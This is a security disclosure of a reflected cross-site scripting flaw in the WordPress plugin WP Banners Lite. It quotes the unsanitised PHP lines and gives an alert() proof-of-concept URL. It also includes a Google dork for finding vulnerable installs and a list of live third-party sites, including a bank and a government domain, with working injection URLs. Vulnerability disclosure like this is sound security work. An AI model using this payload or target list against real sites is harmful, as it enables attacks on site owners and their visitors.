I. Background
--------------
[-] Affected plugin: WP Banners Lite
[-] Plugin Description: The plugin easily allows you to manage ad
banners on your site.
[-] Plugin URL: http://wordpress.org/extend/plugins/wp-banners-lite/
[-] Tested Version: 1.29, 1.31, 1.40
[-] Reported: YES - but no answer
[-] Report Date: 03/12/13
[-] Published:
http://blog.zerial.org/seguridad/vulnerabilidad-en-plugin-para-wordpress-afecta-a-mas-de-200-sitios/
II. Details
------------
Cross-Site Scripting flaw discovered on WP-Banners-Lite.
The problem is wpbanners_show.php, at lines 8 and 9, the developer
doesn't filter correctly the variable called "cid" obtained from URL
(Method GET). He obtains "cid" from URL, do a str_replace to remove '
and then he print it.
[+] File: wpbanners_show.php
[-] Line 8: $cid = $_GET["cid"];
[-] Line 9: $cid = str_replace("'", "", $cid);
[-] Line 51: echo 'jQuery(\'#'.$cid.'\').replaceWith(\''.$banner.'\')';
Then, we can inject our own html or javascript code.
III. Exploit
-------------
The vulnerability can be exploited by injecting html or javascript
code as following:
http://localhost/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSS
Proof-of-Concept/)</script>
IV. URL around the world
-------------------------
[-] Google Dork: inurl:wp-banners-lite inurl:wpbanners_show filetype:php
Demo:
http://www.thexfactornews.co.uk/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=6&cid=a_8b2dfbe0c1d43f9537dae01e96458ff1%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
http://www.forexlistings.net/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_dc09c97fd73d7a324bdbfe7c79525f64%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
http://www.the-news.co/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_cf9a242b70f45317ffd281241fa66502%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
http://web.casinodesalamanca.es/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=2&cid=a_505259756244493872b7709a8a01b536%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
https://www.ironbank.com/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=4&cid=a_13b919438259814cd5be8cb45877d577%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
http://www.defensa.gob.ec/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=3&cid=a_94ef7214c4a90790186e255304f8fd1f%3Cem%3Ea%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
cheers,
--
Fernando A. Lagos Berardi
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial () jabberes org
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information